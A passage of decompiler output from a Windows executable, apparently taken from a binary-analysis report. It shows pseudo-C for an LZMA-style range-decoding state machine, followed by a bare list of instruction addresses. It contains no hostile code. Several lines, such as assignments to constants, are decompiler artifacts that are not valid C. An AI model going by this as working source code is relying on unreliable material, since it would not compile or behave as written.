                											}
                											goto L132;
                										case 9:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												goto L90;
                											}
                											__eflags =  *(__ebp - 0x60);
                											if( *(__ebp - 0x60) == 0) {
                												goto L171;
                											}
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                											__eflags = _t259;
                											0 | _t259 = _t259 + _t259 + 9;
                											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                											goto L76;
                										case 0xa:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 0xb;
                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                												goto L132;
                											}
                											__eax =  *(__ebp - 0x28);
                											goto L89;
                										case 0xb:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__ecx =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x20);
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                											} else {
                												__eax =  *(__ebp - 0x24);
                											}
                											__ecx =  *(__ebp - 0x28);
                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                											L89:
                											__ecx =  *(__ebp - 0x2c);
                											 *(__ebp - 0x2c) = __eax;
                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                											L90:
                											__eax =  *(__ebp - 4);
                											 *(__ebp - 0x80) = 0x15;
                											__eax =  *(__ebp - 4) + 0xa68;
                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                											goto L69;
                										case 0xc:
                											L100:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xc;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t335 = __ebp - 0x70;
                											 *_t335 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t335;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											__eax =  *(__ebp - 0x2c);
                											goto L102;
                										case 0xd:
                											L37:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xd;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t122 = __ebp - 0x70;
                											 *_t122 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t122;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L39:
                											__eax =  *(__ebp - 0x40);
                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                												goto L48;
                											}
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												goto L54;
                											}
                											L41:
                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                											__ecx =  *(__ebp - 0x58);
                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                											 *(__ebp - 0x48) = __eax;
                											__eax = __eax + 1;
                											__eax = __eax << 8;
                											__eax = __eax + __ebx;
                											__esi =  *(__ebp - 0x58) + __eax * 2;
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edx = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												 *(__ebp - 0x40) = 1;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												__ebx = __ebx + __ebx + 1;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edx;
                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L39;
                											} else {
                												goto L37;
                											}
                										case 0xe:
                											L46:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xe;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t156 = __ebp - 0x70;
                											 *_t156 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t156;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											while(1) {
                												L48:
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													break;
                												}
                												__eax =  *(__ebp - 0x58);
                												__edx = __ebx + __ebx;
                												__ecx =  *(__ebp - 0x10);
                												__esi = __edx + __eax;
                												__ecx =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													_t170 = __edx + 1; // 0x1
                													__ebx = _t170;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													continue;
                												} else {
                													goto L46;
                												}
                											}
                											L54:
                											_t173 = __ebp - 0x34;
                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                											__eflags =  *_t173;
                											goto L55;
                										case 0xf:
                											L58:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xf;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t203 = __ebp - 0x70;
                											 *_t203 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t203;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L60:
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												L55:
                												__al =  *(__ebp - 0x44);
                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                												goto L56;
                											}
                											L61:
                											__eax =  *(__ebp - 0x58);
                											__edx = __ebx + __ebx;
                											__ecx =  *(__ebp - 0x10);
                											__esi = __edx + __eax;
                											__ecx =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edi = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												_t217 = __edx + 1; // 0x1
                												__ebx = _t217;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edi;
                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L60;
                											} else {
                												goto L58;
                											}
                										case 0x10:
                											L110:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0x10;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t366 = __ebp - 0x70;
                											 *_t366 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t366;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											goto L112;
                										case 0x11:
                											L69:
                											__esi =  *(__ebp - 0x58);
                											 *(__ebp - 0x84) = 0x12;
                											L132:
                											 *(_t612 - 0x54) = _t605;
                											goto L133;
                										case 0x12:
                											goto L0;
                										case 0x13:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												_t469 = __ebp - 0x58;
                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                												__eflags =  *_t469;
                												 *(__ebp - 0x30) = 0x10;
                												 *(__ebp - 0x40) = 8;
                												goto L144;
                											}
                											__eax =  *(__ebp - 0x4c);
                											__ecx =  *(__ebp - 0x58);
                											__eax =  *(__ebp - 0x4c) << 4;
                											 *(__ebp - 0x30) = 8;
                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                											goto L130;
                										case 0x14:
                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                											__eax =  *(__ebp - 0x80);
                											L140:
                											 *(_t612 - 0x88) = _t533;
                											goto L1;
                										case 0x15:
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                											__al = __al & 0x000000fd;
                											__eax = (__eflags >= 0) - 1 + 0xb;
                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                											goto L121;
                										case 0x16:
                											__eax =  *(__ebp - 0x30);
                											__eflags = __eax - 4;
                											if(__eax >= 4) {
                												_push(3);
                												_pop(__eax);
                											}
                											__ecx =  *(__ebp - 4);
                											 *(__ebp - 0x40) = 6;
                											__eax = __eax << 7;
                											 *(__ebp - 0x7c) = 0x19;
                											 *(__ebp - 0x58) = __eax;
                											goto L145;
                										case 0x17:
                											goto L145;
                										case 0x18:
                											L146:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0x18;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t484 = __ebp - 0x70;
                											 *_t484 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t484;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L148:
                											_t487 = __ebp - 0x48;
                											 *_t487 =  *(__ebp - 0x48) - 1;
                											__eflags =  *_t487;
                											goto L149;
                										case 0x19:
                											__eflags = __ebx - 4;
                											if(__ebx < 4) {
                												 *(__ebp - 0x2c) = __ebx;
                												L120:
                												_t394 = __ebp - 0x2c;
                												 *_t394 =  *(__ebp - 0x2c) + 1;
                												__eflags =  *_t394;
                												L121:
                												__eax =  *(__ebp - 0x2c);
                												__eflags = __eax;
                												if(__eax == 0) {
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                													goto L170;
                												}
                												__eflags = __eax -  *(__ebp - 0x60);
                												if(__eax >  *(__ebp - 0x60)) {
                													goto L171;
                												}
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                												__eax =  *(__ebp - 0x30);
                												_t401 = __ebp - 0x60;
                												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                												__eflags =  *_t401;
                												goto L124;
                											}
                											__ecx = __ebx;
                											__eax = __ebx;
                											__ecx = __ebx >> 1;
                											__eax = __ebx & 0x00000001;
                											__ecx = (__ebx >> 1) - 1;
                											__al = __al | 0x00000002;
                											__eax = (__ebx & 0x00000001) << __cl;
                											__eflags = __ebx - 0xe;
                											 *(__ebp - 0x2c) = __eax;
                											if(__ebx >= 0xe) {
                												__ebx = 0;
                												 *(__ebp - 0x48) = __ecx;
                												L103:
                												__eflags =  *(__ebp - 0x48);
                												if( *(__ebp - 0x48) <= 0) {
                													__eax = __eax + __ebx;
                													 *(__ebp - 0x40) = 4;
                													 *(__ebp - 0x2c) = __eax;
                													__eax =  *(__ebp - 4);
                													__eax =  *(__ebp - 4) + 0x644;
                													__eflags = __eax;
                													L109:
                													__ebx = 0;
                													 *(__ebp - 0x58) = __eax;
                													 *(__ebp - 0x50) = 1;
                													 *(__ebp - 0x44) = 0;
                													 *(__ebp - 0x48) = 0;
                													L113:
                													__eax =  *(__ebp - 0x40);
                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                														_t392 = __ebp - 0x2c;
                														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                														__eflags =  *_t392;
                														goto L120;
                													}
                													__eax =  *(__ebp - 0x50);
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                													__eax =  *(__ebp - 0x58);
                													__esi = __edi + __eax;
                													 *(__ebp - 0x54) = __esi;
                													__ax =  *__esi;
                													__ecx = __ax & 0x0000ffff;
                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                													__eflags =  *(__ebp - 0xc) - __edx;
                													if( *(__ebp - 0xc) >= __edx) {
                														__ecx = 0;
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                														__ecx = 1;
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                														__ebx = 1;
                														__ecx =  *(__ebp - 0x48);
                														__ebx = 1 << __cl;
                														__ecx = 1 << __cl;
                														__ebx =  *(__ebp - 0x44);
                														__ebx =  *(__ebp - 0x44) | __ecx;
                														__cx = __ax;
                														__cx = __ax >> 5;
                														__eax = __eax - __ecx;
                														__edi = __edi + 1;
                														__eflags = __edi;
                														 *(__ebp - 0x44) = __ebx;
                														 *__esi = __ax;
                														 *(__ebp - 0x50) = __edi;
                													} else {
                														 *(__ebp - 0x10) = __edx;
                														0x800 = 0x800 - __ecx;
                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                														 *__esi = __dx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														L112:
                														_t369 = __ebp - 0x48;
                														 *_t369 =  *(__ebp - 0x48) + 1;
                														__eflags =  *_t369;
                														goto L113;
                													} else {
                														goto L110;
                													}
                												}
                												__ecx =  *(__ebp - 0xc);
                												__ebx = __ebx + __ebx;
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                													__ecx =  *(__ebp - 0x10);
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                													__ebx = __ebx | 0x00000001;
                													__eflags = __ebx;
                													 *(__ebp - 0x44) = __ebx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													L102:
                													_t339 = __ebp - 0x48;
                													 *_t339 =  *(__ebp - 0x48) - 1;
                													__eflags =  *_t339;
                													goto L103;
                												} else {
                													goto L100;
                												}
                											}
                											__edx =  *(__ebp - 4);
                											__eax = __eax - __ebx;
                											 *(__ebp - 0x40) = __ecx;
                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                											goto L109;
                										case 0x1a:
                											L56:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												 *(__ebp - 0x88) = 0x1a;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x68);
                											__al =  *(__ebp - 0x5c);
                											__edx =  *(__ebp - 8);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                											 *( *(__ebp - 0x68)) = __al;
                											__ecx =  *(__ebp - 0x14);
                											 *(__ecx +  *(__ebp - 8)) = __al;
                											__eax = __ecx + 1;
                											__edx = 0;
                											_t192 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t192;
                											goto L80;
                										case 0x1b:
                											L76:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												 *(__ebp - 0x88) = 0x1b;
                												goto L170;
                											}
                											__eax =  *(__ebp - 0x14);
                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                											__eflags = __eax -  *(__ebp - 0x74);
                											if(__eax >=  *(__ebp - 0x74)) {
                												__eax = __eax +  *(__ebp - 0x74);
                												__eflags = __eax;
                											}
                											__edx =  *(__ebp - 8);
                											__cl =  *(__eax + __edx);
                											__eax =  *(__ebp - 0x14);
                											 *(__ebp - 0x5c) = __cl;
                											 *(__eax + __edx) = __cl;
                											__eax = __eax + 1;
                											__edx = 0;
                											_t275 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t275;
                											__eax =  *(__ebp - 0x68);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											_t284 = __ebp - 0x64;
                											 *_t284 =  *(__ebp - 0x64) - 1;
                											__eflags =  *_t284;
                											 *( *(__ebp - 0x68)) = __cl;
                											L80:
                											 *(__ebp - 0x14) = __edx;
                											goto L81;
                										case 0x1c:
                											while(1) {
                												L124:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													break;
                												}
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__edx =  *(__ebp - 8);
                												__cl =  *(__eax + __edx);
                												__eax =  *(__ebp - 0x14);
                												 *(__ebp - 0x5c) = __cl;
                												 *(__eax + __edx) = __cl;
                												__eax = __eax + 1;
                												__edx = 0;
                												_t415 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t415;
                												__eax =  *(__ebp - 0x68);
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                												__eflags =  *(__ebp - 0x30);
                												 *( *(__ebp - 0x68)) = __cl;
                												 *(__ebp - 0x14) = _t415;
                												if( *(__ebp - 0x30) > 0) {
                													continue;
                												} else {
                													L81:
                													 *(__ebp - 0x88) = 2;
                													goto L1;
                												}
                											}
                											 *(__ebp - 0x88) = 0x1c;
                											L170:
                											_push(0x22);
                											_pop(_t567);
                											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                											_t535 = 0;
                											L172:
                											return _t535;
                									}
                								}
                								L171:
                								_t535 = _t534 | 0xffffffff;
                								goto L172;
                							}
                						}
                						__eax =  *(__ebp - 0x50);
                						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                						__eax =  *(__ebp - 0x58);
                						__esi = __edx + __eax;
                						 *(__ebp - 0x54) = __esi;
                						__ax =  *__esi;
                						__edi = __ax & 0x0000ffff;
                						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                						if( *(__ebp - 0xc) >= __ecx) {
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                							__cx = __ax;
                							__cx = __ax >> 5;
                							__eax = __eax - __ecx;
                							__edx = __edx + 1;
                							 *__esi = __ax;
                							 *(__ebp - 0x50) = __edx;
                						} else {
                							 *(__ebp - 0x10) = __ecx;
                							0x800 = 0x800 - __edi;
                							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                							 *__esi = __cx;
                						}
                						if( *(__ebp - 0x10) >= 0x1000000) {
                							goto L148;
                						} else {
                							goto L146;
                						}
                					}
                					goto L1;
                				}
                			}








                0x00406335
                0x00406338
                0x0040633b
                0x0040633b
                0x00406340
                0x00000000
                0x00406340
                0x004062f1
                0x004062f4
                0x004062f7
                0x00406301
                0x00000000
                0x00000000
                0x00406355
                0x00406359
                0x0040637c
                0x0040637f
                0x00406382
                0x0040638c
                0x0040635b
                0x0040635b
                0x0040635e
                0x00406361
                0x00406364
                0x00406371
                0x00406374
                0x00406374
                0x00000000
                0x00000000
                0x00406398
                0x0040639c
                0x00000000
                0x00000000
                0x004063a2
                0x004063a6
                0x00000000
                0x00000000
                0x004063ac
                0x004063ae
                0x004063b2
                0x004063b2
                0x004063b5
                0x004063b9
                0x00000000
                0x00000000
                0x00406409
                0x0040640d
                0x00406414
                0x00406417
                0x0040641a
                0x00406424
                0x00000000
                0x00406424
                0x0040640f
                0x00000000
                0x00000000
                0x00406430
                0x00406434
                0x0040643b
                0x0040643e
                0x00406441
                0x00406436
                0x00406436
                0x00406436
                0x00406444
                0x00406447
                0x0040644a
                0x0040644a
                0x0040644d
                0x00406450
                0x00406453
                0x00406453
                0x00406456
                0x0040645d
                0x00406462
                0x00000000
                0x00000000
                0x004064f0
                0x004064f0
                0x004064f4
                0x00406892
                0x00000000
                0x00406892
                0x004064fa
                0x004064fd
                0x00406500
                0x00406504
                0x00406507
                0x0040650d
                0x0040650f
                0x0040650f
                0x0040650f
                0x00406512
                0x00406515
                0x00000000
                0x00000000
                0x004060e5
                0x004060e5
                0x004060e9
                0x00406856
                0x00000000
                0x00406856
                0x004060ef
                0x004060f2
                0x004060f5
                0x004060f9
                0x004060fc
                0x00406102
                0x00406104
                0x00406104
                0x00406104
                0x00406107
                0x0040610a
                0x0040610a
                0x0040610d
                0x00406110
                0x00000000
                0x00000000
                0x00406116
                0x0040611c
                0x00000000
                0x00000000
                0x00406122
                0x00406122
                0x00406126
                0x00406129
                0x0040612c
                0x0040612f
                0x00406132
                0x00406133
                0x00406136
                0x00406138
                0x0040613e
                0x00406141
                0x00406144
                0x00406147
                0x0040614a
                0x0040614d
                0x00406150
                0x0040616c
                0x0040616f
                0x00406172
                0x00406175
                0x0040617c
                0x00406180
                0x00406182
                0x00406186
                0x00406152
                0x00406152
                0x00406156
                0x0040615e
                0x00406163
                0x00406165
                0x00406167
                0x00406167
                0x00406189
                0x00406190
                0x00406193
                0x00000000
                0x00406199
                0x00000000
                0x00406199
                0x00000000
                0x0040619e
                0x0040619e
                0x004061a2
                0x00406862
                0x00000000
                0x00406862
                0x004061a8
                0x004061ab
                0x004061ae
                0x004061b2
                0x004061b5
                0x004061bb
                0x004061bd
                0x004061bd
                0x004061bd
                0x004061c0
                0x004061c3
                0x004061c3
                0x004061c3
                0x004061c9
                0x00000000
                0x00000000
                0x004061cb
                0x004061ce
                0x004061d1
                0x004061d4
                0x004061d7
                0x004061da
                0x004061dd
                0x004061e0
                0x004061e3
                0x004061e6
                0x004061e9
                0x00406201
                0x00406204
                0x00406207
                0x0040620a
                0x0040620a
                0x0040620d
                0x00406211
                0x00406213
                0x004061eb
                0x004061eb
                0x004061f3
                0x004061f8
                0x004061fa
                0x004061fc
                0x004061fc
                0x00406216
                0x0040621d
                0x00406220
                0x00000000
                0x00406222
                0x00000000
                0x00406222
                0x00406220
                0x00406227
                0x00406227
                0x00406227
                0x00406227
                0x00000000
                0x00000000
                0x00406262
                0x00406262
                0x00406266
                0x0040686e
                0x00000000
                0x0040686e
                0x0040626c
                0x0040626f
                0x00406272
                0x00406276
                0x00406279
                0x0040627f
                0x00406281
                0x00406281
                0x00406281
                0x00406284
                0x00406287
                0x00406287
                0x0040628d
                0x0040622b
                0x0040622b
                0x0040622e
                0x00000000
                0x0040622e
                0x0040628f
                0x0040628f
                0x00406292
                0x00406295
                0x00406298
                0x0040629b
                0x0040629e
                0x004062a1
                0x004062a4
                0x004062a7
                0x004062aa
                0x004062ad
                0x004062c5
                0x004062c8
                0x004062cb
                0x004062ce
                0x004062ce
                0x004062d1
                0x004062d5
                0x004062d7
                0x004062af
                0x004062af
                0x004062b7
                0x004062bc
                0x004062be
                0x004062c0
                0x004062c0
                0x004062da
                0x004062e1
                0x004062e4
                0x00000000
                0x004062e6
                0x00000000
                0x004062e6
                0x00000000
                0x00406573
                0x00406573
                0x00406577
                0x0040689e
                0x00000000
                0x0040689e
                0x0040657d
                0x00406580
                0x00406583
                0x00406587
                0x0040658a
                0x00406590
                0x00406592
                0x00406592
                0x00406592
                0x00406595
                0x00000000
                0x00000000
                0x00406343
                0x00406343
                0x00406346
                0x004066b8
                0x004066b8
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040673f
                0x00406743
                0x00406761
                0x00406761
                0x00406761
                0x00406768
                0x0040676f
                0x00000000
                0x0040676f
                0x00406745
                0x00406748
                0x0040674b
                0x0040674e
                0x00406755
                0x00000000
                0x00000000
                0x00406830
                0x00406833
                0x00406734
                0x00406734
                0x00000000
                0x00000000
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00406481
                0x00406484
                0x00406487
                0x00406489
                0x0040648b
                0x0040648b
                0x0040648c
                0x0040648f
                0x00406496
                0x00406499
                0x004064a7
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040678c
                0x0040678c
                0x00406790
                0x004068c8
                0x00000000
                0x004068c8
                0x00406796
                0x00406799
                0x0040679c
                0x004067a0
                0x004067a3
                0x004067a9
                0x004067ab
                0x004067ab
                0x004067ab
                0x004067ae
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b1
                0x00000000
                0x00000000
                0x004064af
                0x004064b2
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x0040654b
                0x0040654d
